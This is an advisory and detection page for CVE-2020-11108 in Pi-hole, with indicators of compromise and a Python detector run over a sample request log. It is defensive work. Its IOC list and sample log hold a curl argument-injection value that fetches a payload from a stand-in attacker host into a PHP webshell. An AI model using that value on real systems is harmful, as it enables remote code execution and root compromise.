CVE-2020-11108
published 2020-05-11


Priority: P1 (80, high)
CVSS 3.1: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Exploit: public exploit available
EPSS: 78.26% (99.5th percentile)
The Gravity updater in Pi-hole through 4.4 allows an authenticated adversary to upload arbitrary files. This can be abused for Remote Code Execution by writing to a PHP file in the web directory. (Also, it can be used in conjunction with the sudo rule for the www-data user to escalate privileges to root.) The code error is in gravity_DownloadBlocklistFromUrl in gravity.sh.

Affected

1 range

Vendor    Product   Version range   Fixed in
pi-hole   pi-hole   <= 4.4          (none listed)

Detection & IOCs (extracted from sources)

url       /admin/index.php
url       /admin/settings.php?tab=blocklists
url       /admin/scripts/pi-hole/php/gravity.sh.php
url       /admin/scripts/pi-hole/php/fun.php
filename  fun.php
filename  teleporter.php
path      /admin/scripts/pi-hole/php/teleporter.php
path      gravity.sh
command   newuserlists=http://<ATTACKER>#" -o fun.php -d "
  • Detect POST requests to /admin/settings.php?tab=blocklists whose 'newuserlists' value carries a curl argument-injection pattern: a URL fragment ('#') followed by -o <filename>.php -d. The injected -o option makes curl write the fetched body to an arbitrary PHP file in the webroot.
  • Detect GET requests to /admin/scripts/pi-hole/php/gravity.sh.php from authenticated sessions, especially in rapid succession (multiple calls within seconds); each call triggers a gravity update that downloads the malicious blocklist.
  • Alert on GET requests to /admin/scripts/pi-hole/php/fun.php, or to any .php file under /admin/scripts/pi-hole/php/ that did not previously exist on the install; this is the attacker invoking the dropped webshell.
  • Monitor for unexpected creation or modification of teleporter.php in the Pi-hole web admin directory: the exploit overwrites it with the payload used for the root privilege escalation.
  • The exploit requires the attacker-controlled HTTP server to listen on port 80 exactly; an outbound connection from the Pi-hole host to port 80 on an unexpected external host during a gravity update is an indicator of exploitation.
  • Look for a Pi-hole admin login followed immediately by a blocklist modification (POST to settings.php?tab=blocklists) and then repeated gravity.sh.php calls; this three-phase sequence is the exploit chain.
  • Exploitation requires authentication to the Pi-hole admin interface: the attacker must hold valid credentials, or the interface must have no password set. The exploit's PASSWORD option may be left blank in the latter case.
  • The attacker's HTTP server must be reachable from the Pi-hole host on port 80 specifically; exploitation fails if SRVPORT is not 80.
  • The root privilege escalation phase overwrites teleporter.php permanently, breaking that application feature; the blocklist entries the exploit added must be cleaned up manually.
  • The exploit may require two consecutive gravity update requests to advance through its stages; a single gravity pull may not be sufficient to trigger payload delivery.
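The request-side indicators above, turned into runnable detection logic. This is an added example, not code from this page or from the Pi-hole project: it runs over a constructed request log of the kind a reverse proxy or WAF in front of the admin UI keeps (POST bodies included, which a plain access log does not carry) and flags the injected 'newuserlists' value, bursts of gravity.sh.php calls, requests for unknown .php files under the scripts directory, and the login / inject / gravity chain per session. The record layout, the timestamps, the sample bodies and the script allowlist are assumptions; file-integrity monitoring of teleporter.php and the outbound port-80 connection are host-side checks not covered here.

```python
"""Detectors for the CVE-2020-11108 exploit chain against Pi-hole <= 4.4.

Added example, not code from this page or from the Pi-hole project. It runs
over a constructed request log (reverse proxy / WAF style, POST bodies kept)
and implements the request-side indicators listed above. The record layout,
timestamps, sample bodies and the script allowlist are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

SCRIPTS_DIR = "/admin/scripts/pi-hole/php/"
GRAVITY_URL = SCRIPTS_DIR + "gravity.sh.php"
# Assumed allowlist; in production build it from the files actually installed.
KNOWN_SCRIPTS = {"gravity.sh.php", "teleporter.php"}
# A '#' fragment that smuggles curl's "-o <name>.php" into the blocklist URL.
INJECTION_RE = re.compile(r"#.*?\s-o\s+\S+\.php\b")


def injected_urls(body):
    """newuserlists entries (one URL per line) that carry the curl injection."""
    hits = []
    for value in parse_qs(body, keep_blank_values=True).get("newuserlists", []):
        hits.extend(line.strip() for line in value.splitlines()
                    if INJECTION_RE.search(line))
    return hits


def unknown_script_requests(requests):
    """(session, name) for GETs of .php files under the scripts dir not in the allowlist."""
    out = []
    for r in requests:
        path = urlsplit(r["url"]).path
        if r["method"] == "GET" and path.startswith(SCRIPTS_DIR):
            name = path[len(SCRIPTS_DIR):]
            if name.endswith(".php") and name not in KNOWN_SCRIPTS:
                out.append((r["session"], name))
    return out


def gravity_bursts(requests, window=10, threshold=2):
    """Sessions calling gravity.sh.php >= threshold times within window seconds."""
    per_session = defaultdict(list)
    for r in requests:
        if r["method"] == "GET" and urlsplit(r["url"]).path == GRAVITY_URL:
            per_session[r["session"]].append(r["ts"])
    flagged = set()
    for sess, times in per_session.items():
        times.sort()
        for i in range(len(times) - threshold + 1):
            if (times[i + threshold - 1] - times[i]).total_seconds() <= window:
                flagged.add(sess)
                break
    return flagged


def exploit_chains(requests):
    """Sessions showing login -> injected blocklist POST -> 2+ gravity runs."""
    state = defaultdict(lambda: {"login": False, "inject": False, "gravity": 0})
    for r in sorted(requests, key=lambda r: r["ts"]):
        s, u = state[r["session"]], urlsplit(r["url"])
        if r["method"] == "POST" and u.path == "/admin/index.php":
            s["login"] = True
        elif (r["method"] == "POST" and u.path == "/admin/settings.php"
              and "tab=blocklists" in u.query and s["login"]
              and injected_urls(r.get("body", ""))):
            s["inject"] = True
        elif r["method"] == "GET" and u.path == GRAVITY_URL and s["inject"]:
            s["gravity"] += 1
    return sorted(sess for sess, s in state.items() if s["gravity"] >= 2)


def T(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


# Constructed sample log: session "a1" is the attacker, "b2" a normal admin.
# 198.51.100.7 is a documentation address standing in for <ATTACKER>.
SAMPLE_LOG = [
    {"ts": T("2020-05-12 10:00:01"), "session": "a1", "method": "POST",
     "url": "/admin/index.php", "body": "pw=redacted"},
    {"ts": T("2020-05-12 10:00:05"), "session": "a1", "method": "POST",
     "url": "/admin/settings.php?tab=blocklists",
     "body": "field=adlists&newuserlists=http%3A%2F%2F198.51.100.7%23%22+-o+fun.php+-d+%22"},
    {"ts": T("2020-05-12 10:00:07"), "session": "a1", "method": "GET", "url": GRAVITY_URL},
    {"ts": T("2020-05-12 10:00:09"), "session": "a1", "method": "GET", "url": GRAVITY_URL},
    {"ts": T("2020-05-12 10:00:12"), "session": "a1", "method": "GET",
     "url": SCRIPTS_DIR + "fun.php?cmd=id"},
    {"ts": T("2020-05-12 11:30:00"), "session": "b2", "method": "POST",
     "url": "/admin/index.php", "body": "pw=redacted"},
    {"ts": T("2020-05-12 11:30:20"), "session": "b2", "method": "POST",
     "url": "/admin/settings.php?tab=blocklists",
     "body": "field=adlists&newuserlists=https%3A%2F%2Fexample.invalid%2Fhosts.txt"},
    {"ts": T("2020-05-12 11:31:00"), "session": "b2", "method": "GET", "url": GRAVITY_URL},
]

if __name__ == "__main__":
    print("chains:", exploit_chains(SAMPLE_LOG))
    print("bursts:", gravity_bursts(SAMPLE_LOG))
    print("unknown scripts:", unknown_script_requests(SAMPLE_LOG))
```

The body check decodes the form first, so percent-encoded or '+'-encoded spaces in the injected value are caught; the chain detector counts gravity runs only after an injected POST in the same session, which keeps an admin who simply edits a list and refreshes gravity once from firing.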

CVSS provenance

NVD v3.1: 8.8 HIGH   CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
NVD v2.0: 9.0 CRITICAL   AV:N/AC:L/Au:S/C:C/I:C/A:C (note: the CVSS v2 severity scale has no CRITICAL band; NVD rates v2 scores of 7.0 to 10.0 as HIGH)